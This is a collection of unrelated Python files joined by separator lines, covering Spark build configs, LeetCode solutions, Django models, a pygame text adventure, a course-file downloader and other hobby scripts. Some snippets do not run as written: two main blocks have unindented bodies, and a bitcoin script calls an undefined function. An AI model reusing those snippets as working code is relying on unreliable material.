            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.13',
            'scala_version_placeholder': '2.13.5',
            'spark_compat_version_placeholder': '3.2',
            'spark_version_placeholder': '3.2.0',
            'hadoop_version_placeholder': '3.3.1',
            'json4s_version_placeholder': '3.7.0-M11',
            'netty_all_version_placeholer': '4.1.72.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.3_2.12',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.12',
            'scala_version_placeholder': '2.12.12',
            'spark_compat_version_placeholder': '3.3',
            'spark_version_placeholder': '3.3.0',
            'hadoop_version_placeholder': '3.3.2',
            'json4s_version_placeholder': '3.7.0-M11',
            'netty_all_version_placeholer': '4.1.74.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.3_2.13',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.13',
            'scala_version_placeholder': '2.13.5',
            'spark_compat_version_placeholder': '3.3',
            'spark_version_placeholder': '3.3.0',
            'hadoop_version_placeholder': '3.3.2',
            'json4s_version_placeholder': '3.7.0-M11',
            'netty_all_version_placeholer': '4.1.74.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.4_2.12',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.12',
            'scala_version_placeholder': '2.12.12',
            'spark_compat_version_placeholder': '3.4',
            'spark_version_placeholder': '3.4.0',
            'hadoop_version_placeholder': '3.3.4',
            'json4s_version_placeholder': '3.7.0-M11',
            'netty_all_version_placeholer': '4.1.87.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.4_2.13',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.13',
            'scala_version_placeholder': '2.13.5',
            'spark_compat_version_placeholder': '3.4',
            'spark_version_placeholder': '3.4.0',
            'hadoop_version_placeholder': '3.3.4',
            'json4s_version_placeholder': '3.7.0-M11',
            'netty_all_version_placeholer': '4.1.87.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_2_13
        }
    }
]
# Generate every configured project next to this script, layering the
# per-project substitutions on top of the shared ones.
current_dir = os.path.dirname(os.path.realpath(__file__))
for cfg in configs:
    merged_substitutions = dict(global_substitition_dict)
    merged_substitutions.update(cfg['substitution_dict'])
    generate_project(
        src_dir=current_dir,
        substitution_dict=merged_substitutions,
        dst_dir=os.path.join(current_dir, cfg['dst_dir'])
    )
|
from ROOT import *
import sys
import os
import re
#TODO: Might need to create this file
gROOT.Macro("rootLogon.C")

# Quantity (branch/expression) to draw, taken from the command line.
quantity = sys.argv[1]
print("\nlooking at " + quantity + " in Signal\n\n")
for bkgFile in os.listdir("smallified_bkg"):
    print("\n\nRunning on "+bkgFile+"\n\n")
    # Only process files matching the smallified naming scheme.  The
    # original called .groups()[1] unconditionally, so any stray file in
    # the directory raised AttributeError; the '.' before 'root' was also
    # unescaped and the pattern unanchored.
    match = re.search(r'(.*)smallified_(.*)\.root$', bkgFile)
    if match is None:
        continue
    bkg = match.groups()[1]
    title = quantity + " of " + bkg
    can = TCanvas(title,title)
    f = TFile("smallified_bkg/"+bkgFile)
    tree = f.Get("ntuplizer/tree")
    tree.Draw(quantity)
    can.Print("%s_%s.png" % (bkg, quantity),'png')
print("\ndone!\n")
|
#!/usr/bin/env python3
"""
Takes a string as input and outputs the reverse
"""
def reverse_str(string_arg):
    """Return *string_arg* with its characters in reverse order."""
    # A negative-step slice reverses without the list round-trip.
    return string_arg[::-1]

print(reverse_str("strings are the best"))
|
# -*- coding: utf-8 -*-
# @Author: WuLC
# @Date: 2017-05-21 15:20:45
# @Last modified by: WuLC
# @Last Modified time: 2017-05-21 15:23:10
# @Email: liangchaowu5@gmail.com
# judge if there are only two kinds of length between points firstly
# then find the neighbors of p1 with the shortest length and judge if the neighboring edge are orthogonal
from math import sqrt
class Solution(object):
    def validSquare(self, p1, p2, p3, p4):
        """Return True iff the four points form a non-degenerate square.

        A square has exactly two distinct squared pairwise distances
        (side and diagonal), both non-zero, and the two side vectors out
        of any corner are orthogonal.

        Changes vs. the original: Python-2-only xrange/map/reduce replaced
        with portable equivalents, and duplicate-point inputs such as
        [0,0],[0,0],[1,1],[1,1] (which previously returned True because
        edge length 0 produced two zero vectors with zero dot product)
        are now rejected via the ``0 in record`` check.
        """
        def distance(a, b):
            # Squared Euclidean distance: exact for integer coordinates,
            # no sqrt needed for equality comparisons.
            return (a[0]-b[0])**2 + (a[1]-b[1])**2

        points = [p1, p2, p3, p4]
        record = set()
        for i in range(4):
            for j in range(i+1, 4):
                record.add(distance(points[i], points[j]))
        if len(record) != 2 or 0 in record:
            return False
        edge = min(record)
        # Corners adjacent to p1 sit at the (shorter) side distance.
        p1_neighbors = [p for p in points if distance(p, p1) == edge]
        p1_vectors = [(p[0]-p1[0], p[1]-p1[1]) for p in p1_neighbors]
        if len(p1_vectors) != 2:  # e.g. [0,0], [1,1], [0,0], [0,0]
            return False
        (ax, ay), (bx, by) = p1_vectors
        # The two side vectors out of p1 must be orthogonal.
        return ax * bx + ay * by == 0
|
#coding:utf-8
'''
函数localWords()与程序清单中的spamTest()函数几乎相同,区别在于这里访问的是
RSS源而不是文件。然后调用函数calcMostFreq()来获得排序最高的30个单词并随后将它们移除
'''
import random
import feedparser
from numpy import array
import bayes
def localWords(feed1, feed0):
    """Train and evaluate a naive-Bayes classifier on two RSS feeds.

    Nearly identical to spamTest() but reads RSS entries instead of files;
    the 30 most frequent words (calcMostFreq) are removed from the
    vocabulary before training.  Class 1 = feed1 entries (NY), class 0 =
    feed0 entries.  Returns (vocabList, p0V, p1V).

    Changes vs. the original: Python-2-only ``print x`` statements replaced
    with the function form (same output for a single argument on Python 2,
    and parseable on Python 3); the dead function-local ``import
    feedparser`` removed (feedparser is never used inside this function).
    """
    docList = []; classList = []; fullText = []
    minLen = min(len(feed1['entries']), len(feed0['entries']))
    # Debug dumps of the raw feed entries.
    print(feed1['entries'])
    print(feed0['entries'])
    for i in range(minLen):
        wordList = bayes.textParse(feed1['entries'][i]['summary'])
        docList.append(wordList)
        fullText.extend(wordList)
        classList.append(1)  # NY is class 1
        wordList = bayes.textParse(feed0['entries'][i]['summary'])
        docList.append(wordList)
        fullText.extend(wordList)
        classList.append(0)
    vocabList = bayes.createVocabList(docList)  # create vocabulary
    top30Words = calcMostFreq(vocabList, fullText)  # remove top 30 words
    for pairW in top30Words:
        if pairW[0] in vocabList: vocabList.remove(pairW[0])
    trainingSet = list(range(2*minLen)); testSet = []  # create test set
    for i in range(10):
        # Move 10 random documents from the training set to the test set.
        randIndex = int(random.uniform(0, len(trainingSet)))
        testSet.append(trainingSet[randIndex])
        del(trainingSet[randIndex])
    trainMat = []; trainClasses = []
    for docIndex in trainingSet:  # train the classifier (get probs) trainNB0
        trainMat.append(bayes.bagOfWord2VecMN(vocabList, docList[docIndex]))
        trainClasses.append(classList[docIndex])
    p0V, p1V, pSpam = bayes.trainNB0(array(trainMat), array(trainClasses))
    errorCount = 0
    for docIndex in testSet:  # classify the remaining items
        wordVector = bayes.bagOfWord2VecMN(vocabList, docList[docIndex])
        if bayes.classifyNB(array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:
            errorCount += 1
    print('the error rate is: ', float(errorCount)/len(testSet))
    return vocabList, p0V, p1V
def calcMostFreq(vocabList, fullText):
    """Return the 30 highest-frequency vocabulary words as
    (word, count) pairs, most frequent first."""
    counts = {token: fullText.count(token) for token in vocabList}
    ranked = sorted(counts.items(), key=lambda kv: kv[1], reverse=True)
    return ranked[:30]
if __name__== "__main__":
#导入RSS数据源
import operator
ny=feedparser.parse('http://newyork.craigslist.org/stp/index.rss')
sf=feedparser.parse('http://sfbay.craigslist.org/stp/index.rss')
localWords(ny,sf) |
import tkinter as tk
import time

# Listbox demo: selecting an entry and pressing the button copies the
# selected value into the label above it.
window = tk.Tk()
window.title('my window')
window.geometry('375x200')
var1 = tk.StringVar()
label = tk.Label(window,bg='yellow',width=4,textvariable=var1)
label.pack()
var2 = tk.StringVar()
var2.set([11,22,33,44])
listbox = tk.Listbox(window,listvariable=var2)
def print_selection():
    # Copy the currently selected listbox value into the label.
    # NOTE(review): listbox.get(listbox.curselection()) raises TclError
    # when nothing is selected -- confirm whether that is acceptable here.
    value = listbox.get(listbox.curselection())
    var1.set(value)
btn1 = tk.Button(window,text='print selection',width=15,height=2,command=print_selection)
btn1.pack()
# Append extra items, insert two at fixed positions, then delete index 2.
list_items=[1,2,3,4]
for item in list_items:
    listbox.insert('end',item)
listbox.insert(1,'first')
listbox.insert(2,'second')
listbox.pack()
listbox.delete(2)
window.mainloop()
"""
977. Squares of a Sorted Array
"""
class Solution:
    def sortedSquares(self, A: 'List[int]') -> 'List[int]':
        """Return the squares of A's elements in non-decreasing order.

        Annotations are quoted because ``List`` is never imported in this
        module -- the original raised NameError at definition time.
        Squaring then sorting is O(n log n); Timsort handles the two
        monotone runs a sorted input produces efficiently.
        """
        return sorted(i * i for i in A)
import pickle
import numpy as np
import os, csv, argparse
import concurrent.futures
FASHION_DIR = "/cvgl/u/anenberg/Fashion144k_stylenet_v1"
SIMILAR_PAIR_DIR = "/cvgl/u/anenberg/Fashion144k_stylenet_v1/similar_pairs"
step_size = 1
similar_thresh = 0.75
def r_metric(i, j, labels):
    """Jaccard similarity (intersection over union) of label rows i and j."""
    intersection = labels[i] & labels[j]
    union = labels[i] | labels[j]
    return 1.0 * sum(intersection) / sum(union)
def find_sim_dis_ims(anchor, labels, ts=0.75, td=0.1, max_it = 100):
    """Sample up to *max_it* candidate rows and return (similar, dissimilar)
    indices relative to *anchor*: the first row whose Jaccard similarity
    exceeds *ts* and the first below *td*.  Either slot may come back None.

    Bug fix: the original branch read ``elif dissimilar < td and dissimilar
    is None`` -- it compared the result slot (always None at that point,
    a TypeError on Python 3) instead of the computed similarity, so a
    dissimilar example could never be recorded.
    """
    similar = None
    dissimilar = None
    sample_idxs = np.random.choice(np.arange(labels.shape[0]), max_it, replace=False)
    for idx in sample_idxs:
        if dissimilar is not None and similar is not None:
            break
        if idx == anchor:
            continue
        similarity = r_metric(anchor, idx, labels)
        if similarity > ts and similar is None:
            similar = idx
        elif similarity < td and dissimilar is None:
            dissimilar = idx
    return (similar, dissimilar)
def triplet(labels, ts=0.75, td=0.1, max_tries=10, max_it=100):
    """Try up to *max_tries* random anchors and return a
    (dissimilar, anchor, similar) index triple once both a similar and a
    dissimilar row are found; returns None implicitly if every try fails."""
    for _ in range(max_tries):
        candidate_anchor = np.random.randint(labels.shape[0])
        sim, dis = find_sim_dis_ims(candidate_anchor, labels, ts=ts, td=td, max_it=max_it)
        if sim is not None and dis is not None:
            return (dis, candidate_anchor, sim)
def find_similar(labels, ts, idx):
    """Return {(idx, j): similarity} for every j > idx whose row exceeds
    Jaccard similarity *ts* with row *idx*; logs progress every 10k rows."""
    pairs = {}
    total = labels.shape[0]
    for j in range(idx + 1, total):
        score = r_metric(idx, j, labels)
        if score > ts:
            pairs[(idx, j)] = score
        if j % 10000 == 0:
            print('running {0}...{1:.2f}'.format(idx, 100.0 * j / total))
    return pairs
def main():
    """Fan out find_similar() over a range of anchor rows with a process
    pool, pickling each anchor's similar-pair dict to its own file."""
    # Labels = concatenation of the color and single-attribute features.
    color_mat = np.load(os.path.join(FASHION_DIR,'feat/feat_col.npy'))
    single_mat = np.load(os.path.join(FASHION_DIR,'feat/feat_sin.npy'))
    labels = np.hstack([color_mat, single_mat])
    parser = argparse.ArgumentParser(description='Computes similarity between image pairs')
    parser.add_argument('-s','--start', help='start index', type=int, default=0)
    parser.add_argument('-e','--end', help='end index', type=int, default=labels.shape[0])
    parser.add_argument('-t','--threads', help='number of threads',type=int, default=50)
    args = parser.parse_args()
    if not os.path.exists(SIMILAR_PAIR_DIR):
        os.mkdir(SIMILAR_PAIR_DIR)
    # Despite the flag name, these are worker *processes*.
    with concurrent.futures.ProcessPoolExecutor(max_workers=args.threads) as executor:
        futures = {}
        for start_idx in range(args.start,args.end):
            futures[executor.submit(find_similar, labels, similar_thresh, start_idx)] = start_idx
        # Save each anchor's result as it completes; failures are logged
        # but do not abort the remaining work.
        for future in concurrent.futures.as_completed(futures):
            start_idx = futures[future]
            try:
                pairs = future.result()
            except Exception as exc:
                print('%r generated an exception: %s' % (start_idx, exc))
            else:
                out_file = os.path.join(
                    SIMILAR_PAIR_DIR,
                    "{0}.pkl".format(start_idx))
                with open(out_file, 'wb') as handle:
                    pickle.dump(pairs, handle)
                print('saving {0}'.format(out_file))
if __name__ == "__main__":
main() |
# Generated by Django 2.0.1 on 2018-01-09 15:43
import defibs.models
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds an optional image field to Defib;
    upload filenames are randomized via defibs.models.RandomFileName
    under uploads/."""
    dependencies = [
        ('defibs', '0002_auto_20180108_1407'),
    ]
    operations = [
        migrations.AddField(
            model_name='defib',
            name='image',
            field=models.ImageField(blank=True, null=True, upload_to=defibs.models.RandomFileName('uploads/')),
        ),
    ]
|
import bitcoin
import pybitcointools
from reportlab.pdfgen import canvas

# Create a one-line PDF report.
EmailReport = canvas.Canvas ("newest.pdf")
EmailReport.drawString(200,800, "YOUR BITCOIN TRANSACTION")
EmailReport.save()
# NOTE(review): `history` is not defined anywhere in this module as
# written, so this line raises NameError at runtime -- presumably it was
# meant to be pybitcointools.history(...) (or a star import was intended);
# confirm before fixing.
history("1CucinVK34txDn6Lxp1VjTpzi2J8FLXxe7")
#!/usr/bin/env python
# coding: utf-8
# In[1]:
def data_grab():
    """Import data -- the imports suggest a CSV -> MySQL pipeline via
    SQLAlchemy/pymysql, but the body appears truncated in this chunk
    (TODO: confirm against the full notebook)."""
    # Function-scope imports for the data pipeline.
    import os
    import pandas as pd
    import pymysql
    import csv
    from sqlalchemy import create_engine, types
|
import random
import re
import discord
import jb2.command
import jb2.embed
class AskCommand(jb2.command.Command):
    """Magic-8-ball style command: replies to ``ask <question>`` with a
    random line from res/text/odpowiedzi.txt."""

    def __init__(self, connector):
        # Preload the answer pool once at construction time.
        with open('res/text/odpowiedzi.txt') as file:
            self.answers = file.readlines()

    def get_pattern(self):
        # One optional argument: the question text.
        return r'ask( .+)?$'

    async def action(self, prefix, message, client):
        content = message.content.strip()
        mention = message.author.mention
        full_pattern = self.get_full_pattern(prefix)
        question = re.match("^" + full_pattern, content).group(1)
        if question is None:
            emb = jb2.embed.error_embed(mention, "Potrzebny parametr: **question**")
        else:
            emb = jb2.embed.embed(":8ball:", mention, random.choice(self.answers))
            emb.colour = 0x007777
        await client.send_message(message.channel, embed=emb)
|
"""
Bachelor's thesis: Generation of guitar tracks utilizing knowledge of song structure
Author: Adam Pankuch
"""
import sys
import glob
import os.path
import json
import gputils
if __name__ == '__main__':
    # Expect exactly three CLI arguments; anything missing -> usage + exit.
    try:
        gpDirPath = sys.argv[1]
        statsOutPath = sys.argv[2]
        logOutPath = sys.argv[3]
    except IndexError:
        print('Use: python stats.py [gp-dir-path] [stats.json] [log.txt]')
        sys.exit(1)
    stats = {}
    # Iterate through all Guitar Pro files and save statistics of songs
    # with markers; count totals for the run log.
    cnt_all = 0
    cnt_mark = 0
    cnt_corrupt = 0
    for filename in glob.iglob(gpDirPath + '**/*.gp*', recursive=True):
        relativeFilename = filename[len(gpDirPath):]
        if os.path.isfile(filename):
            print(cnt_all, ' ', filename)
            try:
                songStat = gputils.getSongStatistics(filename)
                if songStat is not None:
                    stats[relativeFilename] = songStat
                    cnt_mark += 1
            except Exception:
                # Narrowed from a bare except: a bare except also swallows
                # KeyboardInterrupt/SystemExit, making Ctrl-C treat the
                # file as corrupt instead of stopping the run.
                print('=== ERROR - corrupted file ===')
                cnt_corrupt += 1
            cnt_all += 1
    with open(statsOutPath, 'w') as fout:
        output = json.dumps(stats, indent=4)
        fout.write(output)
    log = 'all: ' + str(cnt_all) + '\n'
    log += 'mark: ' + str(cnt_mark) + '\n'
    log += 'corrupt: ' + str(cnt_corrupt) + '\n'
    print(log)
    with open(logOutPath, 'w') as fout:
        fout.write(log)
|
import pygame
#import input_handler
from game_rooms import first_room, second_room, third_room
pygame.init()
screen = pygame.display.set_mode((1200, 600))
clock = pygame.time.Clock()
done = False
splash_screen_over = False
win_screen_over = False
font = pygame.font.SysFont(None, 48)
parser_font = pygame.font.SysFont(None, 72)
#bear_pelt = pygame.image.load("bearpelt16x16.bmp")
startup_splash = pygame.image.load("AsVdayAdventure.bmp")
you_win = pygame.image.load("you_win_yellow.bmp")
pygame.display.set_caption("*Amanda's Valentine's Day Adventure*")
# Fourteen scrollback lines of game text plus the parser input line;
# text_string_list keeps the full history and the last 14 entries are
# re-rendered after each command.
text1_string = ""
text2_string = ""
text3_string = ""
text4_string = ""
text5_string = ""
text6_string = "Samsoft Presents:"
text7_string = "*Amanda's Valentine's Day Adventure*"
text8_string = ""
text9_string = "Type 'quit' or 'exit' to close the program."
text10_string = "Type 'look' to see a little description of where you are."
text11_string = ""
text12_string = ""
text13_string = "You walk in the front door of the house."
text14_string = "Instead of someone on their laptop on the couch, you instead see a bear."
input_string = ""
text_string_list = [text1_string, text2_string, text3_string, text4_string, text5_string, text6_string, text7_string, text8_string, text9_string, text10_string, text11_string, text12_string, text13_string, text14_string]
inventory = []
# Pre-render each line; re-rendered whenever its string changes.
text1 = font.render(text1_string, True, (65, 0, 0))
text2 = font.render(text2_string, True, (65, 0, 0))
text3 = font.render(text3_string, True, (65, 0, 0))
text4 = font.render(text4_string, True, (90, 0, 0))
text5 = font.render(text5_string, True, (90, 0, 0))
text6 = font.render(text6_string, True, (125, 0, 0))
text7 = font.render(text7_string, True, (125, 0, 0))
text8 = font.render(text8_string, True, (125, 0, 0))
text9 = font.render(text9_string, True, (125, 0, 0))
text10 = font.render(text10_string, True, (125, 0, 0))
text11 = font.render(text11_string, True, (125, 0, 0))
text12 = font.render(text12_string, True, (125, 0, 0))
text13 = font.render(text13_string, True, (125, 0, 0))
text14 = font.render(text14_string, True, (125, 0, 0))
text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
def render_all_lines():
    """Blit the 14 scrollback text surfaces (35px apart from the top)
    and the parser line at y=510 onto the screen."""
    history_surfaces = (text1, text2, text3, text4, text5, text6, text7,
                        text8, text9, text10, text11, text12, text13, text14)
    for row, surface in enumerate(history_surfaces):
        screen.blit(surface, (0, row * 35))
    screen.blit(text15, (0, 510))
#def render_inventory(inventory):
#if "bear pelt" in inventory:
# screen.blit(bear_pelt, (1100, 25))
# follow up with rest of inventory here
# Start screen code below
while not splash_screen_over:
    # NOTE(review): drawing happens inside the event loop, so nothing is
    # rendered until the first input event arrives -- confirm intended.
    for event in pygame.event.get():
        screen.fill((255, 255, 255))
        #splash_text = font.render("Welcome to your adventure!", True, (0, 0, 0))
        screen.blit(startup_splash, (60, 50))
        press_enter_text = font.render("Press enter to start.", True, (0, 0, 0))
        # Enter dismisses the splash screen.
        if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
            splash_screen_over = True
        #screen.blit(splash_text, (0,225))
        screen.blit(press_enter_text, (450, 550))
        pygame.display.update()
# Main game loop: collect typed input, run it through the current room's
# parser on Enter, and scroll the last 14 output lines plus the input line.
while not done:
    for event in pygame.event.get():
        # Window close button.  The original tested
        # `event.type == pygame.KEYDOWN and event.type == pygame.QUIT`,
        # which is always False (an event has exactly one type), so the
        # X button never worked; QUIT must be tested on its own.
        if event.type == pygame.QUIT:
            done = True
        elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
            done = True
        elif event.type == pygame.KEYDOWN and event.key == pygame.K_BACKSPACE:
            input_string = input_string[:-1]
            text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
        elif event.type == pygame.KEYDOWN:
            # Accept letters/digits/space into the parser line.
            if event.unicode.isalnum() == True or event.key == pygame.K_SPACE:
                input_string = input_string + event.unicode
                text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
                screen.blit(text15, (0, 510))
                pygame.display.update()
        if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
            if "quit" in input_string or "exit" in input_string:
                done = True
                break
            # MAIN GAME ROOM LOOP HERE
            text_string_list.append(">" + input_string)
            # Room progression is keyed off inventory contents; each room
            # parser returns the lines to append to the scrollback.
            if "petit fours" in inventory and "flower" in inventory:
                room_output = third_room(input_string)
                for i in range(0, len(room_output)):
                    text_string_list.append(room_output[i])
                if "You win the game!" in room_output:
                    inventory.append("cricut stuff")
            elif "petit fours" in inventory:
                room_output = second_room(input_string)
                for i in range(0, len(room_output)):
                    text_string_list.append(room_output[i])
                if "It is on top of some thick, colorful card stock." in room_output:
                    inventory.append("flower")
            else:
                room_output = first_room(input_string)
                if "The door to the pantry is ajar." in room_output:
                    inventory.append("petit fours")
                for i in range(0, len(room_output)):
                    text_string_list.append(room_output[i])
            # Show the most recent 14 lines of history.
            text1_string = text_string_list[-14]
            text2_string = text_string_list[-13]
            text3_string = text_string_list[-12]
            text4_string = text_string_list[-11]
            text5_string = text_string_list[-10]
            text6_string = text_string_list[-9]
            text7_string = text_string_list[-8]
            text8_string = text_string_list[-7]
            text9_string = text_string_list[-6]
            text10_string = text_string_list[-5]
            text11_string = text_string_list[-4]
            text12_string = text_string_list[-3]
            text13_string = text_string_list[-2]
            text14_string = text_string_list[-1]
            input_string = ""
            text1 = font.render(text1_string, True, (65, 0, 0))
            text2 = font.render(text2_string, True, (65, 0, 0))
            text3 = font.render(text3_string, True, (65, 0, 0))
            text4 = font.render(text4_string, True, (90, 0, 0))
            text5 = font.render(text5_string, True, (90, 0, 0))
            text6 = font.render(text6_string, True, (90, 0, 0))
            text7 = font.render(text7_string, True, (90, 0, 0))
            text8 = font.render(text8_string, True, (125, 0, 0))
            text9 = font.render(text9_string, True, (125, 0, 0))
            text10 = font.render(text10_string, True, (125, 0, 0))
            text11 = font.render(text11_string, True, (125, 0, 0))
            text12 = font.render(text12_string, True, (125, 0, 0))
            text13 = font.render(text13_string, True, (125, 0, 0))
            text14 = font.render(text14_string, True, (125, 0, 0))
            text15 = parser_font.render(f">{input_string}", True, (255, 0, 0))
        #elif event.type == pygame.K_END:
            #cursor_position = len(input_string)
        #elif event.type == pygame.K_HOME:
            #cursor_position = 0
    screen.fill((0, 0, 0))
    render_all_lines()
    #render_inventory(inventory)
    pygame.display.update()
    clock.tick(30)
# win screen -- only shown when the full inventory was collected
# (i.e. the player actually finished the game before quitting).
if "petit fours" in inventory and "flower" in inventory and "cricut stuff" in inventory:
    # Give the player time to read the final room text first.
    pygame.time.wait(5000)
    while not win_screen_over:
        for event in pygame.event.get():
            screen.fill((255, 255, 255))
            #winscreen_text = font.render("You have won your adventure!", True, (0, 0, 0))
            win_enter_text = font.render("Press enter to close the program.", True, (0, 0, 0))
            if event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN:
                win_screen_over = True
                done = True
                break
            screen.blit(you_win, (284, 0))
            #screen.blit(winscreen_text, (0, 225))
            screen.blit(win_enter_text, (350, 565))
            pygame.display.update()
|
from django.db import models
import datetime as dt
from django.contrib.auth.models import User
from tinymce.models import HTMLField
class tags(models.Model):
    """Article tag (lowercase class name kept -- Article.tags references it)."""
    name=models.CharField(max_length=30)
    def __str__(self):
        return self.name
class Article(models.Model):
    """A news article written by an editor, tagged and timestamped."""
    title=models.CharField(max_length=60)
    # Rich-text body (tinymce HTMLField).
    post=HTMLField()
    editor=models.ForeignKey(User, on_delete=models.CASCADE)
    tags=models.ManyToManyField(tags)
    pub_date=models.DateTimeField(auto_now_add=True)
    article_image = models.ImageField(upload_to = 'articles/', blank=True)
    @classmethod
    def todays_news(cls):
        """Return articles published today."""
        today=dt.date.today()
        news=cls.objects.filter(pub_date__date=today)
        return news
    @classmethod
    def days_news(cls,date):
        """Return articles published on the given *date*."""
        news=cls.objects.filter(pub_date__date=date)
        return news
    @classmethod
    def search_by_title(cls, search_term):
        """Case-insensitive substring search on the article title."""
        news=cls.objects.filter(title__icontains=search_term)
        return news
class NewsLetterRecipients(models.Model):
    """Newsletter subscriber: display name plus delivery address."""
    name = models.CharField(max_length = 30)
    email = models.EmailField()
class MoringaMerch(models.Model):
    """Merchandise item with a two-decimal-place price."""
    name = models.CharField(max_length=40)
    description = models.TextField()
    price = models.DecimalField(decimal_places=2, max_digits=20)
# python fenix_download login_file <url> -e <file_extension> (DEFAULT = pdf) -d <download_directory>
#
#
from fenix import Fenix
from exceptions import LoginFailedException
from bs4 import BeautifulSoup
import json, argparse, os, re
from urllib.request import urlretrieve
def parse_user(file_name):
    """Load the "user" entry (credentials dict) from a JSON file."""
    with open(file_name, 'r') as handle:
        credentials = json.load(handle)
    return credentials["user"]
def get_download_path(dl_dir, file_url):
    """Return "<dl_dir>/<basename of file_url>", creating dl_dir if needed.

    Fix: the directory is created with exist_ok=True, avoiding the
    check-then-create race of the original os.path.exists() guard.
    """
    os.makedirs(dl_dir, exist_ok=True)
    # The last path segment of the URL becomes the local file name.
    file_name = file_url.split("/")[-1]
    return dl_dir + '/' + file_name
# TODO: this should be a method in Fenix API
def download_file(fenix, url, file):
    """Fetch `url` through the authenticated `fenix` session and write the
    response bytes to the local path `file`."""
    payload = fenix.open(url).read()
    with open(file, 'wb') as out:
        out.write(payload)
def main(url, login_file, file_ext, dl_dir):
    """Log in to Fenix, scrape `url` for links ending in `file_ext`, and
    download each linked file into `dl_dir`.
    """
    user = parse_user(login_file) # get login credentials
    fenix = Fenix(user["username"], user["password"]).login()
    if fenix is None:
        raise LoginFailedException('Could not log in, please make sure that the provided credentials ' +
                                   'are correct.' )
    # TODO: exception handling
    html = fenix.open(url)
    bsObj = BeautifulSoup(html, 'html.parser')
    # Restrict the search to the page's main content column.
    content_div = bsObj.find('div', {'class':'col-sm-9 main-content'})
    # maybe trust internal links only? add an opt to argparse
    # Absolute (http...) links ending with the wanted extension.
    # NOTE(review): the "." before file_ext is unescaped in the regex, so it
    # matches any single character — confirm that is acceptable.
    anchors = content_div.findAll('a', {'href':re.compile('^(http)(.)*(.' + file_ext + ')$')})
    for anchor in anchors:
        dl_path = get_download_path(dl_dir, anchor['href'])
        print('Downloading ' + dl_path + "...")
        # Spaces in URLs are replaced with "+" before fetching.
        download_file(fenix, anchor['href'].replace(" ","+"), dl_path)
if __name__ == '__main__':
    # TODO: argparse
    # CLI: url is positional; login file, extension and download directory
    # are optional flags with sensible defaults.
    parser = argparse.ArgumentParser(description='Download files from Fenix Edu pages')
    parser.add_argument('url', type=str, help='url from where to download the files from')
    parser.add_argument('-l', '--login', type=str, default="login.json" , help='path to fenix login credentials file (check login.json for format)')
    parser.add_argument('-e', '--extension', type=str, default='pdf', help='file extensions to download, without the leading "." (* for all, default is "pdf")')
    parser.add_argument('-d', '--directory', type=str, default='download', help='download directory')
    args = parser.parse_args()
    main(args.url, args.login, args.extension, args.directory)
# -*- coding: utf-8 -*-
from django.contrib import admin
from loggers.models import DebugData
class LoggersAdmin(admin.ModelAdmin):
    """Admin configuration for DebugData log records."""
    # Columns shown in the change list.
    list_display = ('msg_level', 'msg', 'full_debug',)
    # Sidebar filter on severity.
    list_filter = ('msg_level',)
    # Free-text search over the captured debug payload.
    search_fields = ['full_debug']


admin.site.register(DebugData, LoggersAdmin)
|
###########################################
# Let's Have Some Fun
# File Name: 141.py
# Author: Weilin Liu
# Mail: liuweilin17@qq.com
# Created Time: Fri Nov 16 21:19:10 2018
###########################################
#coding=utf-8
#!/usr/bin/python
# 141. Linked List Cycle
from basics.LinkedList import *
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def hasCycle(self, head):
        """Return True if the singly linked list starting at `head` contains
        a cycle (Floyd's tortoise-and-hare).

        :type head: ListNode
        :rtype: bool

        Fixes over the original: None/identity checks use `is`, and both
        pointers advance before comparison, removing the redundant per-step
        None bookkeeping while keeping O(1) space.
        """
        slow = fast = head
        # fast moves two steps per iteration; with a cycle present the two
        # pointers must eventually meet on the same node.
        while fast is not None and fast.next is not None:
            slow = slow.next
            fast = fast.next.next
            if slow is fast:
                return True
        # fast fell off the end, so the list is acyclic.
        return False


if __name__ == '__main__':
    s = Solution()
|
import hpp_idl.hpp.manipulation_idl
from .client import Client
from .problem_solver import ProblemSolver, newProblem
from .constraint_graph import ConstraintGraph
from .constraint_graph_factory import ConstraintGraphFactory
from .constraints import Constraints
from .robot import CorbaClient, Robot
from hpp.corbaserver import loadServerPlugin, createContext
from hpp_idl.hpp.corbaserver.manipulation import Rule
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'home.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from StockData import Ui_StockData
from StockSearching import Ui_StockSearching
from StockCalc import Ui_StockCalc
class Ui_Home(object):
    """pyuic5-generated UI for the Home dialog, extended by hand with
    navigation wiring (see the file header: regeneration discards edits)."""

    def setupUi(self, Home, prewindow, user):
        """Build the widgets and connect navigation.

        Home: the QDialog to populate; prewindow: window to re-show on
        logout. NOTE(review): `user` is accepted but never used here.
        """
        Home.setObjectName("Home")
        Home.resize(519, 505)
